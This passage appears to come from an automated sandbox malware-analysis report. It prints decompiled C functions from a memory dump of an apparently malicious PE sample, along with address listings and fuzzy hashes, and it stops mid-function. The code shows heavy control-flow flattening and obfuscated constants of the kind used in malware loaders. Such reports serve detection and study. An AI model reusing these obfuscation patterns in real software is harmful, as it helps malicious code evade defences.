                                                                                                                                                                                                                    				_v64 = 0x36bd83;
                                                                                                                                                                                                                    				_v64 = _v64 ^ 0x1751bb35;
                                                                                                                                                                                                                    				_v64 = _v64 << 1;
                                                                                                                                                                                                                    				_v64 = _v64 << 6;
                                                                                                                                                                                                                    				_v64 = _v64 ^ 0xb38a6c6f;
                                                                                                                                                                                                                    				_v40 = 0xa874a3;
                                                                                                                                                                                                                    				_v40 = _v40 + 0xffff09e9;
                                                                                                                                                                                                                    				_t181 = 0x69;
                                                                                                                                                                                                                    				_v40 = _v40 * 0x64;
                                                                                                                                                                                                                    				_v40 = _v40 ^ 0x41606515;
                                                                                                                                                                                                                    				_v16 = 0xa0f08c;
                                                                                                                                                                                                                    				_v16 = _v16 << 1;
                                                                                                                                                                                                                    				_v16 = _v16 ^ 0x014a29c5;
                                                                                                                                                                                                                    				_v44 = 0x813054;
                                                                                                                                                                                                                    				_v44 = _v44 + 0x9a63;
                                                                                                                                                                                                                    				_v44 = _v44 / _t181;
                                                                                                                                                                                                                    				_v44 = _v44 ^ 0x000df58f;
                                                                                                                                                                                                                    				_v68 = 0x2c353b;
                                                                                                                                                                                                                    				_v68 = _v68 >> 0xe;
                                                                                                                                                                                                                    				_v68 = _v68 * 0x30;
                                                                                                                                                                                                                    				_v68 = _v68 ^ 0x948cb524;
                                                                                                                                                                                                                    				_v68 = _v68 ^ 0x94897442;
                                                                                                                                                                                                                    				_v32 = 0x449b76;
                                                                                                                                                                                                                    				_v32 = _v32 * 0x42;
                                                                                                                                                                                                                    				_v32 = _v32 ^ 0x7f250715;
                                                                                                                                                                                                                    				_v32 = _v32 ^ 0x6e93ffba;
                                                                                                                                                                                                                    				_v12 = 0xd547df;
                                                                                                                                                                                                                    				_v12 = _v12 ^ 0xcd0f01b9;
                                                                                                                                                                                                                    				_v12 = _v12 ^ 0xcddcb9fd;
                                                                                                                                                                                                                    				_v52 = 0xae03e;
                                                                                                                                                                                                                    				_v52 = _v52 + 0xffff361c;
                                                                                                                                                                                                                    				_v52 = _v52 | 0xc40c531e;
                                                                                                                                                                                                                    				_v52 = _v52 << 0xe;
                                                                                                                                                                                                                    				_v52 = _v52 ^ 0x95d27327;
                                                                                                                                                                                                                    				_v8 = 0x9a974d;
                                                                                                                                                                                                                    				_v8 = _v8 >> 0xe;
                                                                                                                                                                                                                    				_v8 = _v8 ^ 0x00023e29;
                                                                                                                                                                                                                    				_v20 = 0x778d02;
                                                                                                                                                                                                                    				_v20 = _v20 * 0xc;
                                                                                                                                                                                                                    				_v20 = _v20 + 0xffff99af;
                                                                                                                                                                                                                    				_v20 = _v20 ^ 0x05992f20;
                                                                                                                                                                                                                    				_v24 = 0x1ca74c;
                                                                                                                                                                                                                    				_v24 = _v24 + 0x7726;
                                                                                                                                                                                                                    				_v24 = _v24 | 0xb362da6f;
                                                                                                                                                                                                                    				_v24 = _v24 ^ 0xb3788571;
                                                                                                                                                                                                                    				_v56 = 0x172ba0;
                                                                                                                                                                                                                    				_v56 = _v56 * 0x47;
                                                                                                                                                                                                                    				_v56 = _v56 << 4;
                                                                                                                                                                                                                    				_v56 = _v56 >> 0x10;
                                                                                                                                                                                                                    				_v56 = _v56 ^ 0x000ab834;
                                                                                                                                                                                                                    				_v28 = 0x32418d;
                                                                                                                                                                                                                    				_v28 = _v28 >> 0xe;
                                                                                                                                                                                                                    				_v28 = _v28 * 0x38;
                                                                                                                                                                                                                    				_v28 = _v28 ^ 0x000297ad;
                                                                                                                                                                                                                    				do {
                                                                                                                                                                                                                    					while(_t184 != 0x1974be6) {
                                                                                                                                                                                                                    						if(_t184 == 0x52d82ac) {
                                                                                                                                                                                                                    							_t184 = 0xc0aa977;
                                                                                                                                                                                                                    							continue;
                                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                                    							if(_t184 == 0xa429632) {
                                                                                                                                                                                                                    								E00A7E840(_t196,  &_v4, _v52, _v8, _a12, _v20, _v24, _t184, _v56, _v60, _t184, _v28);
                                                                                                                                                                                                                    								 *_t195 = _v4;
                                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                                    								if(_t184 != 0xc0aa977) {
                                                                                                                                                                                                                    									goto L11;
                                                                                                                                                                                                                    								} else {
                                                                                                                                                                                                                    									_t178 = E00A7E840(0,  &_v4, _v36, _v64, _a12, _v40, _v16, _t184, _v44, _v48, _t184, _v68);
                                                                                                                                                                                                                    									_t199 =  &(_t199[0xb]);
                                                                                                                                                                                                                    									if(_t178 != 0) {
                                                                                                                                                                                                                    										_t184 = 0x1974be6;
                                                                                                                                                                                                                    										continue;
                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                    						L14:
                                                                                                                                                                                                                    						return _t196;
                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                    					_t196 = E00A7C6D9(_v4);
                                                                                                                                                                                                                    					if(_t196 == 0) {
                                                                                                                                                                                                                    						_t184 = 0xcd612c4;
                                                                                                                                                                                                                    						goto L11;
                                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                                    						_t184 = 0xa429632;
                                                                                                                                                                                                                    						continue;
                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                    					goto L14;
                                                                                                                                                                                                                    					L11:
                                                                                                                                                                                                                    				} while (_t184 != 0xcd612c4);
                                                                                                                                                                                                                    				goto L14;
                                                                                                                                                                                                                    			}





























                                                                                                                                                                                                                    0x00a78858
                                                                                                                                                                                                                    0x00a7885c
                                                                                                                                                                                                                    0x00a7885e
                                                                                                                                                                                                                    0x00a78862
                                                                                                                                                                                                                    0x00a78866
                                                                                                                                                                                                                    0x00a7886a
                                                                                                                                                                                                                    0x00a7886b
                                                                                                                                                                                                                    0x00a7886c
                                                                                                                                                                                                                    0x00a78871
                                                                                                                                                                                                                    0x00a78879
                                                                                                                                                                                                                    0x00a7887c
                                                                                                                                                                                                                    0x00a78888
                                                                                                                                                                                                                    0x00a7888a
                                                                                                                                                                                                                    0x00a78891
                                                                                                                                                                                                                    0x00a78894
                                                                                                                                                                                                                    0x00a78898
                                                                                                                                                                                                                    0x00a788a0
                                                                                                                                                                                                                    0x00a788b0
                                                                                                                                                                                                                    0x00a788b4
                                                                                                                                                                                                                    0x00a788c0
                                                                                                                                                                                                                    0x00a788c5
                                                                                                                                                                                                                    0x00a788cb
                                                                                                                                                                                                                    0x00a788d3
                                                                                                                                                                                                                    0x00a788db
                                                                                                                                                                                                                    0x00a788e0
                                                                                                                                                                                                                    0x00a788e8
                                                                                                                                                                                                                    0x00a788f0
                                                                                                                                                                                                                    0x00a788f8
                                                                                                                                                                                                                    0x00a78900
                                                                                                                                                                                                                    0x00a78904
                                                                                                                                                                                                                    0x00a78909
                                                                                                                                                                                                                    0x00a78911
                                                                                                                                                                                                                    0x00a78919
                                                                                                                                                                                                                    0x00a78926
                                                                                                                                                                                                                    0x00a78927
                                                                                                                                                                                                                    0x00a7892b
                                                                                                                                                                                                                    0x00a78933
                                                                                                                                                                                                                    0x00a7893b
                                                                                                                                                                                                                    0x00a7893f
                                                                                                                                                                                                                    0x00a78947
                                                                                                                                                                                                                    0x00a7894f
                                                                                                                                                                                                                    0x00a7895d
                                                                                                                                                                                                                    0x00a78961
                                                                                                                                                                                                                    0x00a78969
                                                                                                                                                                                                                    0x00a78971
                                                                                                                                                                                                                    0x00a7897b
                                                                                                                                                                                                                    0x00a7897f
                                                                                                                                                                                                                    0x00a78987
                                                                                                                                                                                                                    0x00a7898f
                                                                                                                                                                                                                    0x00a7899c
                                                                                                                                                                                                                    0x00a789a0
                                                                                                                                                                                                                    0x00a789a8
                                                                                                                                                                                                                    0x00a789b0
                                                                                                                                                                                                                    0x00a789b8
                                                                                                                                                                                                                    0x00a789c0
                                                                                                                                                                                                                    0x00a789c8
                                                                                                                                                                                                                    0x00a789d0
                                                                                                                                                                                                                    0x00a789d8
                                                                                                                                                                                                                    0x00a789e0
                                                                                                                                                                                                                    0x00a789e5
                                                                                                                                                                                                                    0x00a789ed
                                                                                                                                                                                                                    0x00a789f5
                                                                                                                                                                                                                    0x00a789ff
                                                                                                                                                                                                                    0x00a78a0c
                                                                                                                                                                                                                    0x00a78a19
                                                                                                                                                                                                                    0x00a78a1d
                                                                                                                                                                                                                    0x00a78a25
                                                                                                                                                                                                                    0x00a78a2d
                                                                                                                                                                                                                    0x00a78a35
                                                                                                                                                                                                                    0x00a78a3d
                                                                                                                                                                                                                    0x00a78a45
                                                                                                                                                                                                                    0x00a78a4d
                                                                                                                                                                                                                    0x00a78a5a
                                                                                                                                                                                                                    0x00a78a5e
                                                                                                                                                                                                                    0x00a78a63
                                                                                                                                                                                                                    0x00a78a68
                                                                                                                                                                                                                    0x00a78a70
                                                                                                                                                                                                                    0x00a78a78
                                                                                                                                                                                                                    0x00a78a82
                                                                                                                                                                                                                    0x00a78a86
                                                                                                                                                                                                                    0x00a78a8e
                                                                                                                                                                                                                    0x00a78a8e
                                                                                                                                                                                                                    0x00a78a98
                                                                                                                                                                                                                    0x00a78adf
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a78a9a
                                                                                                                                                                                                                    0x00a78a9c
                                                                                                                                                                                                                    0x00a78b3e
                                                                                                                                                                                                                    0x00a78b4a
                                                                                                                                                                                                                    0x00a78a9e
                                                                                                                                                                                                                    0x00a78aa4
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a78aa6
                                                                                                                                                                                                                    0x00a78acf
                                                                                                                                                                                                                    0x00a78ad4
                                                                                                                                                                                                                    0x00a78ad9
                                                                                                                                                                                                                    0x00a78adb
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a78adb
                                                                                                                                                                                                                    0x00a78ad9
                                                                                                                                                                                                                    0x00a78aa4
                                                                                                                                                                                                                    0x00a78a9c
                                                                                                                                                                                                                    0x00a78b4d
                                                                                                                                                                                                                    0x00a78b55
                                                                                                                                                                                                                    0x00a78b55
                                                                                                                                                                                                                    0x00a78af7
                                                                                                                                                                                                                    0x00a78afc
                                                                                                                                                                                                                    0x00a78b02
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a78afe
                                                                                                                                                                                                                    0x00a78afe
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a78afe
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a78b07
                                                                                                                                                                                                                    0x00a78b07
                                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.845522080.0000000000A60000.00000040.00000010.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: #($&w$;5,$>
                                                                                                                                                                                                                    • API String ID: 0-1938879673
                                                                                                                                                                                                                    • Opcode ID: e8fef4ad95c5bfd995f02bc05cab7a8890694a92608a3665b1a1955ba4a258bd
                                                                                                                                                                                                                    • Instruction ID: fc7708ac5ff5c66ace382a2c386efa9ca29d84453153167683ff082355274f17
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e8fef4ad95c5bfd995f02bc05cab7a8890694a92608a3665b1a1955ba4a258bd
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9E810E71508341AFC759CF61C88981FFAF1BBC8758F50991DF29686220D3B6CA198F82
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                    			E00A74BDA() {
                                                                                                                                                                                                                    				char _v520;
                                                                                                                                                                                                                    				signed int _v524;
                                                                                                                                                                                                                    				intOrPtr _v528;
                                                                                                                                                                                                                    				intOrPtr _v532;
                                                                                                                                                                                                                    				intOrPtr _v536;
                                                                                                                                                                                                                    				signed int _v540;
                                                                                                                                                                                                                    				signed int _v544;
                                                                                                                                                                                                                    				signed int _v548;
                                                                                                                                                                                                                    				signed int _v552;
                                                                                                                                                                                                                    				signed int _v556;
                                                                                                                                                                                                                    				signed int _v560;
                                                                                                                                                                                                                    				signed int _v564;
                                                                                                                                                                                                                    				signed int _v568;
                                                                                                                                                                                                                    				signed int _v572;
                                                                                                                                                                                                                    				signed int _v576;
                                                                                                                                                                                                                    				signed int _v580;
                                                                                                                                                                                                                    				char* _t145;
                                                                                                                                                                                                                    				void* _t148;
                                                                                                                                                                                                                    				signed int _t170;
                                                                                                                                                                                                                    				signed int _t172;
                                                                                                                                                                                                                    				signed int _t173;
                                                                                                                                                                                                                    				signed int _t174;
                                                                                                                                                                                                                    				signed int _t175;
                                                                                                                                                                                                                    				short* _t176;
                                                                                                                                                                                                                    				signed int* _t179;
                                                                                                                                                                                                                    
                                                                                                                                                                                                                    				_t179 =  &_v580;
                                                                                                                                                                                                                    				_v524 = _v524 & 0x00000000;
                                                                                                                                                                                                                    				_v536 = 0xb4eb27;
                                                                                                                                                                                                                    				_t148 = 0xeff726f;
                                                                                                                                                                                                                    				_v532 = 0x225ed4;
                                                                                                                                                                                                                    				_v528 = 0xb53878;
                                                                                                                                                                                                                    				_v544 = 0xfa177c;
                                                                                                                                                                                                                    				_v544 = _v544 + 0x9530;
                                                                                                                                                                                                                    				_v544 = _v544 ^ 0x00fe855f;
                                                                                                                                                                                                                    				_v540 = 0xee03fb;
                                                                                                                                                                                                                    				_v540 = _v540 << 0xc;
                                                                                                                                                                                                                    				_v540 = _v540 ^ 0xe039f4fd;
                                                                                                                                                                                                                    				_v572 = 0x902644;
                                                                                                                                                                                                                    				_v572 = _v572 >> 5;
                                                                                                                                                                                                                    				_t172 = 0xb;
                                                                                                                                                                                                                    				_v572 = _v572 / _t172;
                                                                                                                                                                                                                    				_t173 = 0x17;
                                                                                                                                                                                                                    				_v572 = _v572 * 0x14;
                                                                                                                                                                                                                    				_v572 = _v572 ^ 0x000b696a;
                                                                                                                                                                                                                    				_v564 = 0xc42cb7;
                                                                                                                                                                                                                    				_v564 = _v564 / _t173;
                                                                                                                                                                                                                    				_t174 = 0x4e;
                                                                                                                                                                                                                    				_v564 = _v564 / _t174;
                                                                                                                                                                                                                    				_t170 = 0x72;
                                                                                                                                                                                                                    				_t175 = 0x5b;
                                                                                                                                                                                                                    				_v564 = _v564 * 0x65;
                                                                                                                                                                                                                    				_v564 = _v564 ^ 0x00010bc0;
                                                                                                                                                                                                                    				_v576 = 0xcca9c2;
                                                                                                                                                                                                                    				_v576 = _v576 >> 6;
                                                                                                                                                                                                                    				_v576 = _v576 / _t170;
                                                                                                                                                                                                                    				_v576 = _v576 | 0xfc3015ab;
                                                                                                                                                                                                                    				_v576 = _v576 ^ 0xfc397702;
                                                                                                                                                                                                                    				_v580 = 0x28d2ad;
                                                                                                                                                                                                                    				_v580 = _v580 * 0x21;
                                                                                                                                                                                                                    				_v580 = _v580 << 8;
                                                                                                                                                                                                                    				_v580 = _v580 ^ 0xe49310c9;
                                                                                                                                                                                                                    				_v580 = _v580 ^ 0xa7bee4ee;
                                                                                                                                                                                                                    				_v548 = 0x7f4c3b;
                                                                                                                                                                                                                    				_v548 = _v548 >> 0xb;
                                                                                                                                                                                                                    				_v548 = _v548 ^ 0x0001a1f3;
                                                                                                                                                                                                                    				_v556 = 0xf62449;
                                                                                                                                                                                                                    				_v556 = _v556 + 0xffff233d;
                                                                                                                                                                                                                    				_v556 = _v556 / _t175;
                                                                                                                                                                                                                    				_v556 = _v556 ^ 0x000d6a38;
                                                                                                                                                                                                                    				_v552 = 0xaaeda6;
                                                                                                                                                                                                                    				_v552 = _v552 + 0x447e;
                                                                                                                                                                                                                    				_v552 = _v552 ^ 0x00af5724;
                                                                                                                                                                                                                    				_v568 = 0x2146e8;
                                                                                                                                                                                                                    				_v568 = _v568 | 0xfff278b7;
                                                                                                                                                                                                                    				_v568 = _v568 / _t170;
                                                                                                                                                                                                                    				_v568 = _v568 ^ 0x023f27de;
                                                                                                                                                                                                                    				_t176 = _v552;
                                                                                                                                                                                                                    				L1:
                                                                                                                                                                                                                    				while(_t148 != 0x14e3fd0) {
                                                                                                                                                                                                                    					if(_t148 == 0x5714da2) {
                                                                                                                                                                                                                    						_v560 = 0xc7b416;
                                                                                                                                                                                                                    						_v560 = _v560 * 0x4b;
                                                                                                                                                                                                                    						_v560 = _v560 ^ 0x1281955f;
                                                                                                                                                                                                                    						_v560 = _v560 ^ 0x2800572f;
                                                                                                                                                                                                                    						_t176 =  &_v520 + E00A6E325( &_v520, _v576, _v580, _v548) * 2;
                                                                                                                                                                                                                    						while(1) {
                                                                                                                                                                                                                    							_t145 =  &_v520;
                                                                                                                                                                                                                    							if(_t176 <= _t145) {
                                                                                                                                                                                                                    								break;
                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                    							if( *_t176 != 0x5c) {
                                                                                                                                                                                                                    								L10:
                                                                                                                                                                                                                    								_t176 = _t176 - 2;
                                                                                                                                                                                                                    								continue;
                                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                                    								_t120 =  &_v560;
                                                                                                                                                                                                                    								 *_t120 = _v560 - 1;
                                                                                                                                                                                                                    								if( *_t120 == 0) {
                                                                                                                                                                                                                    									_t176 = _t176 + 2;
                                                                                                                                                                                                                    								} else {
                                                                                                                                                                                                                    									goto L10;
                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                    							L14:
                                                                                                                                                                                                                    							_t148 = 0x14e3fd0;
                                                                                                                                                                                                                    							goto L1;
                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                    						goto L14;
                                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                                    						if(_t148 == 0x9ba7be1) {
                                                                                                                                                                                                                    							_t145 = E00A6D804(_v544, _v540,  &_v520, _t148, _v572, _v564);
                                                                                                                                                                                                                    							_t179 =  &(_t179[4]);
                                                                                                                                                                                                                    							_t148 = 0x5714da2;
                                                                                                                                                                                                                    							continue;
                                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                                    							if(_t148 == 0xeff726f) {
                                                                                                                                                                                                                    								_t148 = 0x9ba7be1;
                                                                                                                                                                                                                    								continue;
                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                    					L16:
                                                                                                                                                                                                                    					if(_t148 != 0x55926d3) {
                                                                                                                                                                                                                    						continue;
                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                    					return _t145;
                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                    				E00A705ED(_t176,  *0xa83b38 + 0xc, _v556, _v552, _v568);
                                                                                                                                                                                                                    				_t179 =  &(_t179[3]);
                                                                                                                                                                                                                    				_t148 = 0x55926d3;
                                                                                                                                                                                                                    				goto L16;
                                                                                                                                                                                                                    			}




























                                                                                                                                                                                                                    0x00a74bda
                                                                                                                                                                                                                    0x00a74be0
                                                                                                                                                                                                                    0x00a74be7
                                                                                                                                                                                                                    0x00a74bef
                                                                                                                                                                                                                    0x00a74bf4
                                                                                                                                                                                                                    0x00a74bfc
                                                                                                                                                                                                                    0x00a74c04
                                                                                                                                                                                                                    0x00a74c0c
                                                                                                                                                                                                                    0x00a74c14
                                                                                                                                                                                                                    0x00a74c1c
                                                                                                                                                                                                                    0x00a74c24
                                                                                                                                                                                                                    0x00a74c29
                                                                                                                                                                                                                    0x00a74c31
                                                                                                                                                                                                                    0x00a74c39
                                                                                                                                                                                                                    0x00a74c48
                                                                                                                                                                                                                    0x00a74c4d
                                                                                                                                                                                                                    0x00a74c58
                                                                                                                                                                                                                    0x00a74c5b
                                                                                                                                                                                                                    0x00a74c5f
                                                                                                                                                                                                                    0x00a74c67
                                                                                                                                                                                                                    0x00a74c77
                                                                                                                                                                                                                    0x00a74c7f
                                                                                                                                                                                                                    0x00a74c84
                                                                                                                                                                                                                    0x00a74c8f
                                                                                                                                                                                                                    0x00a74c92
                                                                                                                                                                                                                    0x00a74c93
                                                                                                                                                                                                                    0x00a74c97
                                                                                                                                                                                                                    0x00a74c9f
                                                                                                                                                                                                                    0x00a74ca7
                                                                                                                                                                                                                    0x00a74cb4
                                                                                                                                                                                                                    0x00a74cb8
                                                                                                                                                                                                                    0x00a74cc0
                                                                                                                                                                                                                    0x00a74cc8
                                                                                                                                                                                                                    0x00a74cd5
                                                                                                                                                                                                                    0x00a74cd9
                                                                                                                                                                                                                    0x00a74cde
                                                                                                                                                                                                                    0x00a74ce6
                                                                                                                                                                                                                    0x00a74cee
                                                                                                                                                                                                                    0x00a74cf6
                                                                                                                                                                                                                    0x00a74cfb
                                                                                                                                                                                                                    0x00a74d03
                                                                                                                                                                                                                    0x00a74d0b
                                                                                                                                                                                                                    0x00a74d1b
                                                                                                                                                                                                                    0x00a74d1f
                                                                                                                                                                                                                    0x00a74d27
                                                                                                                                                                                                                    0x00a74d2f
                                                                                                                                                                                                                    0x00a74d37
                                                                                                                                                                                                                    0x00a74d3f
                                                                                                                                                                                                                    0x00a74d47
                                                                                                                                                                                                                    0x00a74d5a
                                                                                                                                                                                                                    0x00a74d5e
                                                                                                                                                                                                                    0x00a74d66
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a74d74
                                                                                                                                                                                                                    0x00a74d7e
                                                                                                                                                                                                                    0x00a74db6
                                                                                                                                                                                                                    0x00a74dc7
                                                                                                                                                                                                                    0x00a74dcb
                                                                                                                                                                                                                    0x00a74dd3
                                                                                                                                                                                                                    0x00a74df2
                                                                                                                                                                                                                    0x00a74e06
                                                                                                                                                                                                                    0x00a74e06
                                                                                                                                                                                                                    0x00a74e0c
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a74dfb
                                                                                                                                                                                                                    0x00a74e03
                                                                                                                                                                                                                    0x00a74e03
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a74dfd
                                                                                                                                                                                                                    0x00a74dfd
                                                                                                                                                                                                                    0x00a74dfd
                                                                                                                                                                                                                    0x00a74e01
                                                                                                                                                                                                                    0x00a74e10
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a74e01
                                                                                                                                                                                                                    0x00a74e13
                                                                                                                                                                                                                    0x00a74e13
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a74e13
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a74d80
                                                                                                                                                                                                                    0x00a74d82
                                                                                                                                                                                                                    0x00a74daa
                                                                                                                                                                                                                    0x00a74daf
                                                                                                                                                                                                                    0x00a74db2
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a74d84
                                                                                                                                                                                                                    0x00a74d8a
                                                                                                                                                                                                                    0x00a74d90
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a74d90
                                                                                                                                                                                                                    0x00a74d8a
                                                                                                                                                                                                                    0x00a74d82
                                                                                                                                                                                                                    0x00a74e3e
                                                                                                                                                                                                                    0x00a74e44
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a74e54
                                                                                                                                                                                                                    0x00a74e54
                                                                                                                                                                                                                    0x00a74e31
                                                                                                                                                                                                                    0x00a74e36
                                                                                                                                                                                                                    0x00a74e39
                                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.845522080.0000000000A60000.00000040.00000010.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: /W$8j$~D$F!
                                                                                                                                                                                                                    • API String ID: 0-3990382135
                                                                                                                                                                                                                    • Opcode ID: 2174cbc7e3032c3fe9917513963b762ded75ff986af4794fc59d9e3ad57ca2ed
                                                                                                                                                                                                                    • Instruction ID: e0262d7136ba8bddeb80576d11e271abd13403eda19f3c68e24e85c19c8e473c
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2174cbc7e3032c3fe9917513963b762ded75ff986af4794fc59d9e3ad57ca2ed
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1C6164725083419BC718DF25D98951FBBF1FBC8758F148A1DF5D9AA260D3B0CA498F82
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    C-Code - Quality: 96%
                                                                                                                                                                                                                    			E00A70660() {
                                                                                                                                                                                                                    				char _v520;
                                                                                                                                                                                                                    				void* _v532;
                                                                                                                                                                                                                    				intOrPtr _v536;
                                                                                                                                                                                                                    				signed int _v540;
                                                                                                                                                                                                                    				signed int _v544;
                                                                                                                                                                                                                    				signed int _v548;
                                                                                                                                                                                                                    				signed int _v552;
                                                                                                                                                                                                                    				signed int _v556;
                                                                                                                                                                                                                    				signed int _v560;
                                                                                                                                                                                                                    				signed int _v564;
                                                                                                                                                                                                                    				signed int _v568;
                                                                                                                                                                                                                    				signed int _v572;
                                                                                                                                                                                                                    				signed int _v576;
                                                                                                                                                                                                                    				signed int _t121;
                                                                                                                                                                                                                    				signed int _t122;
                                                                                                                                                                                                                    				signed int _t124;
                                                                                                                                                                                                                    				signed int _t129;
                                                                                                                                                                                                                    				void* _t130;
                                                                                                                                                                                                                    				signed int _t143;
                                                                                                                                                                                                                    				signed int _t144;
                                                                                                                                                                                                                    				void* _t146;
                                                                                                                                                                                                                    				signed int _t147;
                                                                                                                                                                                                                    				signed int* _t148;
                                                                                                                                                                                                                    
                                                                                                                                                                                                                    				_t148 =  &_v576;
                                                                                                                                                                                                                    				_v536 = 0xe062f9;
                                                                                                                                                                                                                    				asm("stosd");
                                                                                                                                                                                                                    				_t146 = 0;
                                                                                                                                                                                                                    				_t130 = 0x999ead0;
                                                                                                                                                                                                                    				asm("stosd");
                                                                                                                                                                                                                    				asm("stosd");
                                                                                                                                                                                                                    				_v572 = 0x283834;
                                                                                                                                                                                                                    				_v572 = _v572 + 0xffffcef3;
                                                                                                                                                                                                                    				_v572 = _v572 + 0x18ca;
                                                                                                                                                                                                                    				_v572 = _v572 + 0x8bdc;
                                                                                                                                                                                                                    				_v572 = _v572 ^ 0x00240689;
                                                                                                                                                                                                                    				_v540 = 0x4e1978;
                                                                                                                                                                                                                    				_v540 = _v540 | 0xf5e369bf;
                                                                                                                                                                                                                    				_v540 = _v540 + 0xffffd851;
                                                                                                                                                                                                                    				_v540 = _v540 ^ 0xf5e3fc5e;
                                                                                                                                                                                                                    				_v552 = 0x7fb7f2;
                                                                                                                                                                                                                    				_v552 = _v552 + 0xffffe119;
                                                                                                                                                                                                                    				_v552 = _v552 | 0xad414959;
                                                                                                                                                                                                                    				_v552 = _v552 + 0xffff96b4;
                                                                                                                                                                                                                    				_v552 = _v552 ^ 0xad787564;
                                                                                                                                                                                                                    				_v564 = 0xbdb200;
                                                                                                                                                                                                                    				_v564 = _v564 | 0x118445da;
                                                                                                                                                                                                                    				_t143 = 0x37;
                                                                                                                                                                                                                    				_v564 = _v564 * 0x48;
                                                                                                                                                                                                                    				_v564 = _v564 / _t143;
                                                                                                                                                                                                                    				_v564 = _v564 ^ 0x04966202;
                                                                                                                                                                                                                    				_v576 = 0xa7df76;
                                                                                                                                                                                                                    				_v576 = _v576 >> 6;
                                                                                                                                                                                                                    				_v576 = _v576 ^ 0x00089354;
                                                                                                                                                                                                                    				_v560 = 0xd70414;
                                                                                                                                                                                                                    				_v560 = _v560 + 0x3d7d;
                                                                                                                                                                                                                    				_v560 = _v560 | 0xc24da698;
                                                                                                                                                                                                                    				_t144 = 0x14;
                                                                                                                                                                                                                    				_t145 = _v576;
                                                                                                                                                                                                                    				_v560 = _v560 / _t144;
                                                                                                                                                                                                                    				_v560 = _v560 ^ 0x09bfa0b7;
                                                                                                                                                                                                                    				_v568 = 0xf9811;
                                                                                                                                                                                                                    				_v568 = _v568 >> 0xd;
                                                                                                                                                                                                                    				_v568 = _v568 ^ 0xf1f7ab0a;
                                                                                                                                                                                                                    				_v568 = _v568 ^ 0x6b0e265f;
                                                                                                                                                                                                                    				_v568 = _v568 ^ 0x9afb602d;
                                                                                                                                                                                                                    				_v544 = 0x262460;
                                                                                                                                                                                                                    				_v544 = _v544 + 0x184f;
                                                                                                                                                                                                                    				_v544 = _v544 + 0x8602;
                                                                                                                                                                                                                    				_v544 = _v544 ^ 0x002a144f;
                                                                                                                                                                                                                    				_t129 = _v576;
                                                                                                                                                                                                                    				_t147 = _v576;
                                                                                                                                                                                                                    				_v556 = 0xd88f23;
                                                                                                                                                                                                                    				_v556 = _v556 * 0x6c;
                                                                                                                                                                                                                    				_v556 = _v556 + 0xffff9cfb;
                                                                                                                                                                                                                    				_v556 = _v556 ^ 0x335d6f2f;
                                                                                                                                                                                                                    				_v556 = _v556 ^ 0x6800d6b5;
                                                                                                                                                                                                                    				_v548 = 0x7f713;
                                                                                                                                                                                                                    				_v548 = _v548 ^ 0x39532e35;
                                                                                                                                                                                                                    				_v548 = _v548 ^ 0xb0d5ac84;
                                                                                                                                                                                                                    				_v548 = _v548 ^ 0x89817271;
                                                                                                                                                                                                                    				do {
                                                                                                                                                                                                                    					while(_t130 != 0x461d75f) {
                                                                                                                                                                                                                    						if(_t130 == 0x4c21736) {
                                                                                                                                                                                                                    							_t122 = E00A7AAF3(_v544, _t147, _v556, _v548);
                                                                                                                                                                                                                    							_t148 =  &(_t148[3]);
                                                                                                                                                                                                                    							_t129 = _t122;
